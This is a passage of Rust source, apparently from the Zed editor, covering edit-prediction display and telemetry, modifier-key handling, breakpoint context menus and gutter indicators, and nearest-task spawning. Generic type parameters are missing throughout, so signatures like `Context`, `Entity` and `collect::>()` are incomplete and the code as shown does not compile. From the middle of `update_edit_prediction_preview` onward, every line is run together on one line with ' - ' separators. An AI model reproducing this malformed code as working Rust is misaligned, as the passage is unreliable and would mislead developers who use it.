        // not backed by a file or the path has no extension.
        let extension = buffer
            .read(cx)
            .file()
            .and_then(|file| Some(file.path().extension()?.to_string_lossy().to_string()));

        let event_type = match accepted {
            true => "Edit Prediction Accepted",
            false => "Edit Prediction Discarded",
        };
        telemetry::event!(
            event_type,
            provider = provider.name(),
            prediction_id = id,
            suggestion_accepted = accepted,
            file_extension = extension,
        );
    }

    /// Whether an inline completion is currently being displayed.
    pub fn has_active_inline_completion(&self) -> bool {
        self.active_inline_completion.is_some()
    }

    /// Removes the active inline completion, splicing out its inlays and
    /// clearing its text highlights. The removed completion is stashed in
    /// `stale_inline_completion_in_menu` so the menu can keep rendering it.
    /// Returns `false` if there was no active completion.
    fn take_active_inline_completion(&mut self, cx: &mut Context) -> bool {
        let Some(active_inline_completion) = self.active_inline_completion.take() else {
            return false;
        };

        self.splice_inlays(&active_inline_completion.inlay_ids, Default::default(), cx);
        // NOTE(review): the turbofish type argument appears to have been lost
        // from this excerpt (`clear_highlights::(cx)`) — confirm the intended
        // highlight marker type against the original file.
        self.clear_highlights::(cx);
        self.stale_inline_completion_in_menu = Some(active_inline_completion);
        true
    }

    /// Returns true when the edit-prediction popover is displayed below the
    /// cursor — i.e. when not previewing, and either the LSP autocomplete menu
    /// is visible or we are in `when_holding_modifier` mode.
    pub fn edit_prediction_visible_in_cursor_popover(&self, has_completion: bool) -> bool {
        // Never shown while previewing, when predictions are configured to
        // render inline rather than in the menu, or when disabled entirely.
        if self.edit_prediction_preview_is_active()
            || !self.show_edit_predictions_in_menu()
            || !self.edit_predictions_enabled()
        {
            return false;
        }

        if self.has_visible_completions_menu() {
            return true;
        }

        has_completion && self.edit_prediction_requires_modifier()
    }

    /// Central handler for modifier-key changes: updates the edit-prediction
    /// preview, the columnar-selection mode, and — while the pointer is over
    /// the text area — the modifier-dependent hovered link.
    fn handle_modifiers_changed(
        &mut self,
        modifiers: Modifiers,
        position_map: &PositionMap,
        window: &mut Window,
        cx: &mut Context,
    ) {
        if self.show_edit_predictions_in_menu() {
            self.update_edit_prediction_preview(&modifiers, window, cx);
        }

        self.update_selection_mode(&modifiers, position_map, window, cx);

        let mouse_position = window.mouse_position();
        // Link highlighting only applies while hovering the text hitbox.
        if !position_map.text_hitbox.is_hovered(window) {
            return;
        }

        self.update_hovered_link(
            position_map.point_for_position(mouse_position),
            &position_map.snapshot,
            modifiers,
            window,
            cx,
        )
    }

    /// Switches an in-progress (pending) mouse selection to columnar mode when
    /// exactly the columnar-selection modifiers are held.
    fn update_selection_mode(
        &mut self,
        modifiers: &Modifiers,
        position_map: &PositionMap,
        window: &mut Window,
        cx: &mut Context,
    ) {
        if modifiers != &COLUMNAR_SELECTION_MODIFIERS || self.selections.pending.is_none() {
            return;
        }

        let mouse_position = window.mouse_position();
        let point_for_position = position_map.point_for_position(mouse_position);
        let position = point_for_position.previous_valid;

        self.select(
            SelectPhase::BeginColumnar {
                position,
                // reset: false — continue the existing pending selection.
                reset: false,
                goal_column: point_for_position.exact_unclipped.column(),
            },
            window,
            cx,
        );
    }

    /// Enters or exits the edit-prediction preview depending on whether the
    /// held modifiers match the accept-prediction keybinding's modifiers.
    fn update_edit_prediction_preview(
        &mut self,
        modifiers: &Modifiers,
        window: &mut Window,
        cx: &mut Context,
    ) {
        let accept_keybind = self.accept_edit_prediction_keybind(window, cx);
        let Some(accept_keystroke) = accept_keybind.keystroke() else {
            return;
        };

        // Only enter preview on a real modifier chord (not a bare key press).
        if &accept_keystroke.modifiers == modifiers && accept_keystroke.modifiers.modified() {
            if matches!(
                self.edit_prediction_preview,
EditPredictionPreview::Inactive { .. } - ) { - self.edit_prediction_preview = EditPredictionPreview::Active { - previous_scroll_position: None, - since: Instant::now(), - }; - - self.update_visible_inline_completion(window, cx); - cx.notify(); - } - } else if let EditPredictionPreview::Active { - previous_scroll_position, - since, - } = self.edit_prediction_preview - { - if let (Some(previous_scroll_position), Some(position_map)) = - (previous_scroll_position, self.last_position_map.as_ref()) - { - self.set_scroll_position( - previous_scroll_position - .scroll_position(&position_map.snapshot.display_snapshot), - window, - cx, - ); - } - - self.edit_prediction_preview = EditPredictionPreview::Inactive { - released_too_fast: since.elapsed() < Duration::from_millis(200), - }; - self.clear_row_highlights::(); - self.update_visible_inline_completion(window, cx); - cx.notify(); - } - } - - fn update_visible_inline_completion( - &mut self, - _window: &mut Window, - cx: &mut Context, - ) -> Option<()> { - let selection = self.selections.newest_anchor(); - let cursor = selection.head(); - let multibuffer = self.buffer.read(cx).snapshot(cx); - let offset_selection = selection.map(|endpoint| endpoint.to_offset(&multibuffer)); - let excerpt_id = cursor.excerpt_id; - - let show_in_menu = self.show_edit_predictions_in_menu(); - let completions_menu_has_precedence = !show_in_menu - && (self.context_menu.borrow().is_some() - || (!self.completion_tasks.is_empty() && !self.has_active_inline_completion())); - - if completions_menu_has_precedence - || !offset_selection.is_empty() - || self - .active_inline_completion - .as_ref() - .map_or(false, |completion| { - let invalidation_range = completion.invalidation_range.to_offset(&multibuffer); - let invalidation_range = invalidation_range.start..=invalidation_range.end; - !invalidation_range.contains(&offset_selection.head()) - }) - { - self.discard_inline_completion(false, cx); - return None; - } - - 
self.take_active_inline_completion(cx); - let Some(provider) = self.edit_prediction_provider() else { - self.edit_prediction_settings = EditPredictionSettings::Disabled; - return None; - }; - - let (buffer, cursor_buffer_position) = - self.buffer.read(cx).text_anchor_for_position(cursor, cx)?; - - self.edit_prediction_settings = - self.edit_prediction_settings_at_position(&buffer, cursor_buffer_position, cx); - - self.edit_prediction_indent_conflict = multibuffer.is_line_whitespace_upto(cursor); - - if self.edit_prediction_indent_conflict { - let cursor_point = cursor.to_point(&multibuffer); - - let indents = multibuffer.suggested_indents(cursor_point.row..cursor_point.row + 1, cx); - - if let Some((_, indent)) = indents.iter().next() { - if indent.len == cursor_point.column { - self.edit_prediction_indent_conflict = false; - } - } - } - - let inline_completion = provider.suggest(&buffer, cursor_buffer_position, cx)?; - let edits = inline_completion - .edits - .into_iter() - .flat_map(|(range, new_text)| { - let start = multibuffer.anchor_in_excerpt(excerpt_id, range.start)?; - let end = multibuffer.anchor_in_excerpt(excerpt_id, range.end)?; - Some((start..end, new_text)) - }) - .collect::>(); - if edits.is_empty() { - return None; - } - - let first_edit_start = edits.first().unwrap().0.start; - let first_edit_start_point = first_edit_start.to_point(&multibuffer); - let edit_start_row = first_edit_start_point.row.saturating_sub(2); - - let last_edit_end = edits.last().unwrap().0.end; - let last_edit_end_point = last_edit_end.to_point(&multibuffer); - let edit_end_row = cmp::min(multibuffer.max_point().row, last_edit_end_point.row + 2); - - let cursor_row = cursor.to_point(&multibuffer).row; - - let snapshot = multibuffer.buffer_for_excerpt(excerpt_id).cloned()?; - - let mut inlay_ids = Vec::new(); - let invalidation_row_range; - let move_invalidation_row_range = if cursor_row < edit_start_row { - Some(cursor_row..edit_end_row) - } else if cursor_row > edit_end_row 
{ - Some(edit_start_row..cursor_row) - } else { - None - }; - let is_move = - move_invalidation_row_range.is_some() || self.inline_completions_hidden_for_vim_mode; - let completion = if is_move { - invalidation_row_range = - move_invalidation_row_range.unwrap_or(edit_start_row..edit_end_row); - let target = first_edit_start; - InlineCompletion::Move { target, snapshot } - } else { - let show_completions_in_buffer = !self.edit_prediction_visible_in_cursor_popover(true) - && !self.inline_completions_hidden_for_vim_mode; - - if show_completions_in_buffer { - if edits - .iter() - .all(|(range, _)| range.to_offset(&multibuffer).is_empty()) - { - let mut inlays = Vec::new(); - for (range, new_text) in &edits { - let inlay = Inlay::inline_completion( - post_inc(&mut self.next_inlay_id), - range.start, - new_text.as_str(), - ); - inlay_ids.push(inlay.id); - inlays.push(inlay); - } - - self.splice_inlays(&[], inlays, cx); - } else { - let background_color = cx.theme().status().deleted_background; - self.highlight_text::( - edits.iter().map(|(range, _)| range.clone()).collect(), - HighlightStyle { - background_color: Some(background_color), - ..Default::default() - }, - cx, - ); - } - } - - invalidation_row_range = edit_start_row..edit_end_row; - - let display_mode = if all_edits_insertions_or_deletions(&edits, &multibuffer) { - if provider.show_tab_accept_marker() { - EditDisplayMode::TabAccept - } else { - EditDisplayMode::Inline - } - } else { - EditDisplayMode::DiffPopover - }; - - InlineCompletion::Edit { - edits, - edit_preview: inline_completion.edit_preview, - display_mode, - snapshot, - } - }; - - let invalidation_range = multibuffer - .anchor_before(Point::new(invalidation_row_range.start, 0)) - ..multibuffer.anchor_after(Point::new( - invalidation_row_range.end, - multibuffer.line_len(MultiBufferRow(invalidation_row_range.end)), - )); - - self.stale_inline_completion_in_menu = None; - self.active_inline_completion = Some(InlineCompletionState { - inlay_ids, - 
completion, - completion_id: inline_completion.id, - invalidation_range, - }); - - cx.notify(); - - Some(()) - } - - pub fn edit_prediction_provider(&self) -> Option> { - Some(self.edit_prediction_provider.as_ref()?.provider.clone()) - } - - fn render_code_actions_indicator( - &self, - _style: &EditorStyle, - row: DisplayRow, - is_active: bool, - breakpoint: Option<&(Anchor, Breakpoint)>, - cx: &mut Context, - ) -> Option { - let color = Color::Muted; - let position = breakpoint.as_ref().map(|(anchor, _)| *anchor); - let show_tooltip = !self.context_menu_visible(); - - if self.available_code_actions.is_some() { - Some( - IconButton::new("code_actions_indicator", ui::IconName::Bolt) - .shape(ui::IconButtonShape::Square) - .icon_size(IconSize::XSmall) - .icon_color(color) - .toggle_state(is_active) - .when(show_tooltip, |this| { - this.tooltip({ - let focus_handle = self.focus_handle.clone(); - move |window, cx| { - Tooltip::for_action_in( - "Toggle Code Actions", - &ToggleCodeActions { - deployed_from_indicator: None, - quick_launch: false, - }, - &focus_handle, - window, - cx, - ) - } - }) - }) - .on_click(cx.listener(move |editor, e: &ClickEvent, window, cx| { - let quick_launch = e.down.button == MouseButton::Left; - window.focus(&editor.focus_handle(cx)); - editor.toggle_code_actions( - &ToggleCodeActions { - deployed_from_indicator: Some(row), - quick_launch, - }, - window, - cx, - ); - })) - .on_right_click(cx.listener(move |editor, event: &ClickEvent, window, cx| { - editor.set_breakpoint_context_menu( - row, - position, - event.down.position, - window, - cx, - ); - })), - ) - } else { - None - } - } - - fn clear_tasks(&mut self) { - self.tasks.clear() - } - - fn insert_tasks(&mut self, key: (BufferId, BufferRow), value: RunnableTasks) { - if self.tasks.insert(key, value).is_some() { - // This case should hopefully be rare, but just in case... 
- log::error!( - "multiple different run targets found on a single line, only the last target will be rendered" - ) - } - } - - /// Get all display points of breakpoints that will be rendered within editor - /// - /// This function is used to handle overlaps between breakpoints and Code action/runner symbol. - /// It's also used to set the color of line numbers with breakpoints to the breakpoint color. - /// TODO debugger: Use this function to color toggle symbols that house nested breakpoints - fn active_breakpoints( - &self, - range: Range, - window: &mut Window, - cx: &mut Context, - ) -> HashMap { - let mut breakpoint_display_points = HashMap::default(); - - let Some(breakpoint_store) = self.breakpoint_store.clone() else { - return breakpoint_display_points; - }; - - let snapshot = self.snapshot(window, cx); - - let multi_buffer_snapshot = &snapshot.display_snapshot.buffer_snapshot; - let Some(project) = self.project.as_ref() else { - return breakpoint_display_points; - }; - - let range = snapshot.display_point_to_point(DisplayPoint::new(range.start, 0), Bias::Left) - ..snapshot.display_point_to_point(DisplayPoint::new(range.end, 0), Bias::Right); - - for (buffer_snapshot, range, excerpt_id) in - multi_buffer_snapshot.range_to_buffer_ranges(range) - { - let Some(buffer) = project.read_with(cx, |this, cx| { - this.buffer_for_id(buffer_snapshot.remote_id(), cx) - }) else { - continue; - }; - let breakpoints = breakpoint_store.read(cx).breakpoints( - &buffer, - Some( - buffer_snapshot.anchor_before(range.start) - ..buffer_snapshot.anchor_after(range.end), - ), - buffer_snapshot, - cx, - ); - for (anchor, breakpoint) in breakpoints { - let multi_buffer_anchor = - Anchor::in_buffer(excerpt_id, buffer_snapshot.remote_id(), *anchor); - let position = multi_buffer_anchor - .to_point(&multi_buffer_snapshot) - .to_display_point(&snapshot); - - breakpoint_display_points - .insert(position.row(), (multi_buffer_anchor, breakpoint.clone())); - } - } - - 
breakpoint_display_points - } - - fn breakpoint_context_menu( - &self, - anchor: Anchor, - window: &mut Window, - cx: &mut Context, - ) -> Entity { - let weak_editor = cx.weak_entity(); - let focus_handle = self.focus_handle(cx); - - let row = self - .buffer - .read(cx) - .snapshot(cx) - .summary_for_anchor::(&anchor) - .row; - - let breakpoint = self - .breakpoint_at_row(row, window, cx) - .map(|(anchor, bp)| (anchor, Arc::from(bp))); - - let log_breakpoint_msg = if breakpoint.as_ref().is_some_and(|bp| bp.1.message.is_some()) { - "Edit Log Breakpoint" - } else { - "Set Log Breakpoint" - }; - - let condition_breakpoint_msg = if breakpoint - .as_ref() - .is_some_and(|bp| bp.1.condition.is_some()) - { - "Edit Condition Breakpoint" - } else { - "Set Condition Breakpoint" - }; - - let hit_condition_breakpoint_msg = if breakpoint - .as_ref() - .is_some_and(|bp| bp.1.hit_condition.is_some()) - { - "Edit Hit Condition Breakpoint" - } else { - "Set Hit Condition Breakpoint" - }; - - let set_breakpoint_msg = if breakpoint.as_ref().is_some() { - "Unset Breakpoint" - } else { - "Set Breakpoint" - }; - - let run_to_cursor = command_palette_hooks::CommandPaletteFilter::try_global(cx) - .map_or(false, |filter| !filter.is_hidden(&DebuggerRunToCursor)); - - let toggle_state_msg = breakpoint.as_ref().map_or(None, |bp| match bp.1.state { - BreakpointState::Enabled => Some("Disable"), - BreakpointState::Disabled => Some("Enable"), - }); - - let (anchor, breakpoint) = - breakpoint.unwrap_or_else(|| (anchor, Arc::new(Breakpoint::new_standard()))); - - ui::ContextMenu::build(window, cx, |menu, _, _cx| { - menu.on_blur_subscription(Subscription::new(|| {})) - .context(focus_handle) - .when(run_to_cursor, |this| { - let weak_editor = weak_editor.clone(); - this.entry("Run to cursor", None, move |window, cx| { - weak_editor - .update(cx, |editor, cx| { - editor.change_selections(None, window, cx, |s| { - s.select_ranges([Point::new(row, 0)..Point::new(row, 0)]) - }); - }) - .ok(); - - 
window.dispatch_action(Box::new(DebuggerRunToCursor), cx); - }) - .separator() - }) - .when_some(toggle_state_msg, |this, msg| { - this.entry(msg, None, { - let weak_editor = weak_editor.clone(); - let breakpoint = breakpoint.clone(); - move |_window, cx| { - weak_editor - .update(cx, |this, cx| { - this.edit_breakpoint_at_anchor( - anchor, - breakpoint.as_ref().clone(), - BreakpointEditAction::InvertState, - cx, - ); - }) - .log_err(); - } - }) - }) - .entry(set_breakpoint_msg, None, { - let weak_editor = weak_editor.clone(); - let breakpoint = breakpoint.clone(); - move |_window, cx| { - weak_editor - .update(cx, |this, cx| { - this.edit_breakpoint_at_anchor( - anchor, - breakpoint.as_ref().clone(), - BreakpointEditAction::Toggle, - cx, - ); - }) - .log_err(); - } - }) - .entry(log_breakpoint_msg, None, { - let breakpoint = breakpoint.clone(); - let weak_editor = weak_editor.clone(); - move |window, cx| { - weak_editor - .update(cx, |this, cx| { - this.add_edit_breakpoint_block( - anchor, - breakpoint.as_ref(), - BreakpointPromptEditAction::Log, - window, - cx, - ); - }) - .log_err(); - } - }) - .entry(condition_breakpoint_msg, None, { - let breakpoint = breakpoint.clone(); - let weak_editor = weak_editor.clone(); - move |window, cx| { - weak_editor - .update(cx, |this, cx| { - this.add_edit_breakpoint_block( - anchor, - breakpoint.as_ref(), - BreakpointPromptEditAction::Condition, - window, - cx, - ); - }) - .log_err(); - } - }) - .entry(hit_condition_breakpoint_msg, None, move |window, cx| { - weak_editor - .update(cx, |this, cx| { - this.add_edit_breakpoint_block( - anchor, - breakpoint.as_ref(), - BreakpointPromptEditAction::HitCondition, - window, - cx, - ); - }) - .log_err(); - }) - }) - } - - fn render_breakpoint( - &self, - position: Anchor, - row: DisplayRow, - breakpoint: &Breakpoint, - cx: &mut Context, - ) -> IconButton { - // Is it a breakpoint that shows up when hovering over gutter? 
- let (is_phantom, collides_with_existing) = self.gutter_breakpoint_indicator.0.map_or( - (false, false), - |PhantomBreakpointIndicator { - is_active, - display_row, - collides_with_existing_breakpoint, - }| { - ( - is_active && display_row == row, - collides_with_existing_breakpoint, - ) - }, - ); - - let (color, icon) = { - let icon = match (&breakpoint.message.is_some(), breakpoint.is_disabled()) { - (false, false) => ui::IconName::DebugBreakpoint, - (true, false) => ui::IconName::DebugLogBreakpoint, - (false, true) => ui::IconName::DebugDisabledBreakpoint, - (true, true) => ui::IconName::DebugDisabledLogBreakpoint, - }; - - let color = if is_phantom { - Color::Hint - } else { - Color::Debugger - }; - - (color, icon) - }; - - let breakpoint = Arc::from(breakpoint.clone()); - - let alt_as_text = gpui::Keystroke { - modifiers: Modifiers::secondary_key(), - ..Default::default() - }; - let primary_action_text = if breakpoint.is_disabled() { - "enable" - } else if is_phantom && !collides_with_existing { - "set" - } else { - "unset" - }; - let mut primary_text = format!("Click to {primary_action_text}"); - if collides_with_existing && !breakpoint.is_disabled() { - use std::fmt::Write; - write!(primary_text, ", {alt_as_text}-click to disable").ok(); - } - let primary_text = SharedString::from(primary_text); - let focus_handle = self.focus_handle.clone(); - IconButton::new(("breakpoint_indicator", row.0 as usize), icon) - .icon_size(IconSize::XSmall) - .size(ui::ButtonSize::None) - .icon_color(color) - .style(ButtonStyle::Transparent) - .on_click(cx.listener({ - let breakpoint = breakpoint.clone(); - - move |editor, event: &ClickEvent, window, cx| { - let edit_action = if event.modifiers().platform || breakpoint.is_disabled() { - BreakpointEditAction::InvertState - } else { - BreakpointEditAction::Toggle - }; - - window.focus(&editor.focus_handle(cx)); - editor.edit_breakpoint_at_anchor( - position, - breakpoint.as_ref().clone(), - edit_action, - cx, - ); - } - })) - 
.on_right_click(cx.listener(move |editor, event: &ClickEvent, window, cx| { - editor.set_breakpoint_context_menu( - row, - Some(position), - event.down.position, - window, - cx, - ); - })) - .tooltip(move |window, cx| { - Tooltip::with_meta_in( - primary_text.clone(), - None, - "Right-click for more options", - &focus_handle, - window, - cx, - ) - }) - } - - fn build_tasks_context( - project: &Entity, - buffer: &Entity, - buffer_row: u32, - tasks: &Arc, - cx: &mut Context, - ) -> Task> { - let position = Point::new(buffer_row, tasks.column); - let range_start = buffer.read(cx).anchor_at(position, Bias::Right); - let location = Location { - buffer: buffer.clone(), - range: range_start..range_start, - }; - // Fill in the environmental variables from the tree-sitter captures - let mut captured_task_variables = TaskVariables::default(); - for (capture_name, value) in tasks.extra_variables.clone() { - captured_task_variables.insert( - task::VariableName::Custom(capture_name.into()), - value.clone(), - ); - } - project.update(cx, |project, cx| { - project.task_store().update(cx, |task_store, cx| { - task_store.task_context_for_location(captured_task_variables, location, cx) - }) - }) - } - - pub fn spawn_nearest_task( - &mut self, - action: &SpawnNearestTask, - window: &mut Window, - cx: &mut Context, - ) { - let Some((workspace, _)) = self.workspace.clone() else { - return; - }; - let Some(project) = self.project.clone() else { - return; - }; - - // Try to find a closest, enclosing node using tree-sitter that has a - // task - let Some((buffer, buffer_row, tasks)) = self - .find_enclosing_node_task(cx) - // Or find the task that's closest in row-distance. 
- .or_else(|| self.find_closest_task(cx)) - else { - return; - }; - - let reveal_strategy = action.reveal; - let task_context = Self::build_tasks_context(&project, &buffer, buffer_row, &tasks, cx); - cx.spawn_in(window, async move |_, cx| { - let context = task_context.await?; - let (task_source_kind, mut resolved_task) = tasks.resolve(&context).next()?; - - let resolved = &mut resolved_task.resolved; - resolved.reveal = reveal_strategy; - - workspace - .update_in(cx, |workspace, window, cx| { - workspace.schedule_resolved_task( - task_source_kind, - resolved_task, - false, - window, - cx, - ); - }) - .ok() - }) - .detach(); - } - - fn find_closest_task( - &mut self, - cx: &mut Context, - ) -> Option<(Entity, u32, Arc)> { - let cursor_row = self.selections.newest_adjusted(cx).head().row; - - let ((buffer_id, row), tasks) = self - .tasks - .iter() - .min_by_key(|((_, row), _)| cursor_row.abs_diff(*row))?; - - let buffer = self.buffer.read(cx).buffer(*buffer_id)?; - let tasks = Arc::new(tasks.to_owned()); - Some((buffer, *row, tasks)) - } - - fn find_enclosing_node_task( - &mut self, - cx: &mut Context, - ) -> Option<(Entity, u32, Arc)> { - let snapshot = self.buffer.read(cx).snapshot(cx); - let offset = self.selections.newest::(cx).head(); - let excerpt = snapshot.excerpt_containing(offset..offset)?; - let buffer_id = excerpt.buffer().remote_id(); - - let layer = excerpt.buffer().syntax_layer_at(offset)?; - let mut cursor = layer.node().walk(); - - while cursor.goto_first_child_for_byte(offset).is_some() { - if cursor.node().end_byte() == offset { - cursor.goto_next_sibling(); - } - } - - // Ascend to the smallest ancestor that contains the range and has a task. 
- loop { - let node = cursor.node(); - let node_range = node.byte_range(); - let symbol_start_row = excerpt.buffer().offset_to_point(node.start_byte()).row; - - // Check if this node contains our offset - if node_range.start <= offset && node_range.end >= offset { - // If it contains offset, check for task - if let Some(tasks) = self.tasks.get(&(buffer_id, symbol_start_row)) { - let buffer = self.buffer.read(cx).buffer(buffer_id)?; - return Some((buffer, symbol_start_row, Arc::new(tasks.to_owned()))); - } - } - - if !cursor.goto_parent() { - break; - } - } - None - } - - fn render_run_indicator( - &self, - _style: &EditorStyle, - is_active: bool, - row: DisplayRow, - breakpoint: Option<(Anchor, Breakpoint)>, - cx: &mut Context, - ) -> IconButton { - let color = Color::Muted; - let position = breakpoint.as_ref().map(|(anchor, _)| *anchor); - - IconButton::new(("run_indicator", row.0 as usize), ui::IconName::Play) - .shape(ui::IconButtonShape::Square) - .icon_size(IconSize::XSmall) - .icon_color(color) - .toggle_state(is_active) - .on_click(cx.listener(move |editor, e: &ClickEvent, window, cx| { - let quick_launch = e.down.button == MouseButton::Left; - window.focus(&editor.focus_handle(cx)); - editor.toggle_code_actions( - &ToggleCodeActions { - deployed_from_indicator: Some(row), - quick_launch, - }, - window, - cx, - ); - })) - .on_right_click(cx.listener(move |editor, event: &ClickEvent, window, cx| { - editor.set_breakpoint_context_menu(row, position, event.down.position, window, cx); - })) - } - - pub fn context_menu_visible(&self) -> bool { - !self.edit_prediction_preview_is_active() - && self - .context_menu - .borrow() - .as_ref() - .map_or(false, |menu| menu.visible()) - } - - fn context_menu_origin(&self) -> Option { - self.context_menu - .borrow() - .as_ref() - .map(|menu| menu.origin()) - } - - pub fn set_context_menu_options(&mut self, options: ContextMenuOptions) { - self.context_menu_options = Some(options); - } - - const 
EDIT_PREDICTION_POPOVER_PADDING_X: Pixels = Pixels(24.); - const EDIT_PREDICTION_POPOVER_PADDING_Y: Pixels = Pixels(2.); - - fn render_edit_prediction_popover( - &mut self, - text_bounds: &Bounds, - content_origin: gpui::Point, - editor_snapshot: &EditorSnapshot, - visible_row_range: Range, - scroll_top: f32, - scroll_bottom: f32, - line_layouts: &[LineWithInvisibles], - line_height: Pixels, - scroll_pixel_position: gpui::Point, - newest_selection_head: Option, - editor_width: Pixels, - style: &EditorStyle, - window: &mut Window, - cx: &mut App, - ) -> Option<(AnyElement, gpui::Point)> { - let active_inline_completion = self.active_inline_completion.as_ref()?; - - if self.edit_prediction_visible_in_cursor_popover(true) { - return None; - } - - match &active_inline_completion.completion { - InlineCompletion::Move { target, .. } => { - let target_display_point = target.to_display_point(editor_snapshot); - - if self.edit_prediction_requires_modifier() { - if !self.edit_prediction_preview_is_active() { - return None; - } - - self.render_edit_prediction_modifier_jump_popover( - text_bounds, - content_origin, - visible_row_range, - line_layouts, - line_height, - scroll_pixel_position, - newest_selection_head, - target_display_point, - window, - cx, - ) - } else { - self.render_edit_prediction_eager_jump_popover( - text_bounds, - content_origin, - editor_snapshot, - visible_row_range, - scroll_top, - scroll_bottom, - line_height, - scroll_pixel_position, - target_display_point, - editor_width, - window, - cx, - ) - } - } - InlineCompletion::Edit { - display_mode: EditDisplayMode::Inline, - .. - } => None, - InlineCompletion::Edit { - display_mode: EditDisplayMode::TabAccept, - edits, - .. 
- } => { - let range = &edits.first()?.0; - let target_display_point = range.end.to_display_point(editor_snapshot); - - self.render_edit_prediction_end_of_line_popover( - "Accept", - editor_snapshot, - visible_row_range, - target_display_point, - line_height, - scroll_pixel_position, - content_origin, - editor_width, - window, - cx, - ) - } - InlineCompletion::Edit { - edits, - edit_preview, - display_mode: EditDisplayMode::DiffPopover, - snapshot, - } => self.render_edit_prediction_diff_popover( - text_bounds, - content_origin, - editor_snapshot, - visible_row_range, - line_layouts, - line_height, - scroll_pixel_position, - newest_selection_head, - editor_width, - style, - edits, - edit_preview, - snapshot, - window, - cx, - ), - } - } - - fn render_edit_prediction_modifier_jump_popover( - &mut self, - text_bounds: &Bounds, - content_origin: gpui::Point, - visible_row_range: Range, - line_layouts: &[LineWithInvisibles], - line_height: Pixels, - scroll_pixel_position: gpui::Point, - newest_selection_head: Option, - target_display_point: DisplayPoint, - window: &mut Window, - cx: &mut App, - ) -> Option<(AnyElement, gpui::Point)> { - let scrolled_content_origin = - content_origin - gpui::Point::new(scroll_pixel_position.x, Pixels(0.0)); - - const SCROLL_PADDING_Y: Pixels = px(12.); - - if target_display_point.row() < visible_row_range.start { - return self.render_edit_prediction_scroll_popover( - |_| SCROLL_PADDING_Y, - IconName::ArrowUp, - visible_row_range, - line_layouts, - newest_selection_head, - scrolled_content_origin, - window, - cx, - ); - } else if target_display_point.row() >= visible_row_range.end { - return self.render_edit_prediction_scroll_popover( - |size| text_bounds.size.height - size.height - SCROLL_PADDING_Y, - IconName::ArrowDown, - visible_row_range, - line_layouts, - newest_selection_head, - scrolled_content_origin, - window, - cx, - ); - } - - const POLE_WIDTH: Pixels = px(2.); - - let line_layout = - 
line_layouts.get(target_display_point.row().minus(visible_row_range.start) as usize)?; - let target_column = target_display_point.column() as usize; - - let target_x = line_layout.x_for_index(target_column); - let target_y = - (target_display_point.row().as_f32() * line_height) - scroll_pixel_position.y; - - let flag_on_right = target_x < text_bounds.size.width / 2.; - - let mut border_color = Self::edit_prediction_callout_popover_border_color(cx); - border_color.l += 0.001; - - let mut element = v_flex() - .items_end() - .when(flag_on_right, |el| el.items_start()) - .child(if flag_on_right { - self.render_edit_prediction_line_popover("Jump", None, window, cx)? - .rounded_bl(px(0.)) - .rounded_tl(px(0.)) - .border_l_2() - .border_color(border_color) - } else { - self.render_edit_prediction_line_popover("Jump", None, window, cx)? - .rounded_br(px(0.)) - .rounded_tr(px(0.)) - .border_r_2() - .border_color(border_color) - }) - .child(div().w(POLE_WIDTH).bg(border_color).h(line_height)) - .into_any(); - - let size = element.layout_as_root(AvailableSpace::min_size(), window, cx); - - let mut origin = scrolled_content_origin + point(target_x, target_y) - - point( - if flag_on_right { - POLE_WIDTH - } else { - size.width - POLE_WIDTH - }, - size.height - line_height, - ); - - origin.x = origin.x.max(content_origin.x); - - element.prepaint_at(origin, window, cx); - - Some((element, origin)) - } - - fn render_edit_prediction_scroll_popover( - &mut self, - to_y: impl Fn(Size) -> Pixels, - scroll_icon: IconName, - visible_row_range: Range, - line_layouts: &[LineWithInvisibles], - newest_selection_head: Option, - scrolled_content_origin: gpui::Point, - window: &mut Window, - cx: &mut App, - ) -> Option<(AnyElement, gpui::Point)> { - let mut element = self - .render_edit_prediction_line_popover("Scroll", Some(scroll_icon), window, cx)? 
- .into_any(); - - let size = element.layout_as_root(AvailableSpace::min_size(), window, cx); - - let cursor = newest_selection_head?; - let cursor_row_layout = - line_layouts.get(cursor.row().minus(visible_row_range.start) as usize)?; - let cursor_column = cursor.column() as usize; - - let cursor_character_x = cursor_row_layout.x_for_index(cursor_column); - - let origin = scrolled_content_origin + point(cursor_character_x, to_y(size)); - - element.prepaint_at(origin, window, cx); - Some((element, origin)) - } - - fn render_edit_prediction_eager_jump_popover( - &mut self, - text_bounds: &Bounds, - content_origin: gpui::Point, - editor_snapshot: &EditorSnapshot, - visible_row_range: Range, - scroll_top: f32, - scroll_bottom: f32, - line_height: Pixels, - scroll_pixel_position: gpui::Point, - target_display_point: DisplayPoint, - editor_width: Pixels, - window: &mut Window, - cx: &mut App, - ) -> Option<(AnyElement, gpui::Point)> { - if target_display_point.row().as_f32() < scroll_top { - let mut element = self - .render_edit_prediction_line_popover( - "Jump to Edit", - Some(IconName::ArrowUp), - window, - cx, - )? - .into_any(); - - let size = element.layout_as_root(AvailableSpace::min_size(), window, cx); - let offset = point( - (text_bounds.size.width - size.width) / 2., - Self::EDIT_PREDICTION_POPOVER_PADDING_Y, - ); - - let origin = text_bounds.origin + offset; - element.prepaint_at(origin, window, cx); - Some((element, origin)) - } else if (target_display_point.row().as_f32() + 1.) > scroll_bottom { - let mut element = self - .render_edit_prediction_line_popover( - "Jump to Edit", - Some(IconName::ArrowDown), - window, - cx, - )? 
- .into_any(); - - let size = element.layout_as_root(AvailableSpace::min_size(), window, cx); - let offset = point( - (text_bounds.size.width - size.width) / 2., - text_bounds.size.height - size.height - Self::EDIT_PREDICTION_POPOVER_PADDING_Y, - ); - - let origin = text_bounds.origin + offset; - element.prepaint_at(origin, window, cx); - Some((element, origin)) - } else { - self.render_edit_prediction_end_of_line_popover( - "Jump to Edit", - editor_snapshot, - visible_row_range, - target_display_point, - line_height, - scroll_pixel_position, - content_origin, - editor_width, - window, - cx, - ) - } - } - - fn render_edit_prediction_end_of_line_popover( - self: &mut Editor, - label: &'static str, - editor_snapshot: &EditorSnapshot, - visible_row_range: Range, - target_display_point: DisplayPoint, - line_height: Pixels, - scroll_pixel_position: gpui::Point, - content_origin: gpui::Point, - editor_width: Pixels, - window: &mut Window, - cx: &mut App, - ) -> Option<(AnyElement, gpui::Point)> { - let target_line_end = DisplayPoint::new( - target_display_point.row(), - editor_snapshot.line_len(target_display_point.row()), - ); - - let mut element = self - .render_edit_prediction_line_popover(label, None, window, cx)? 
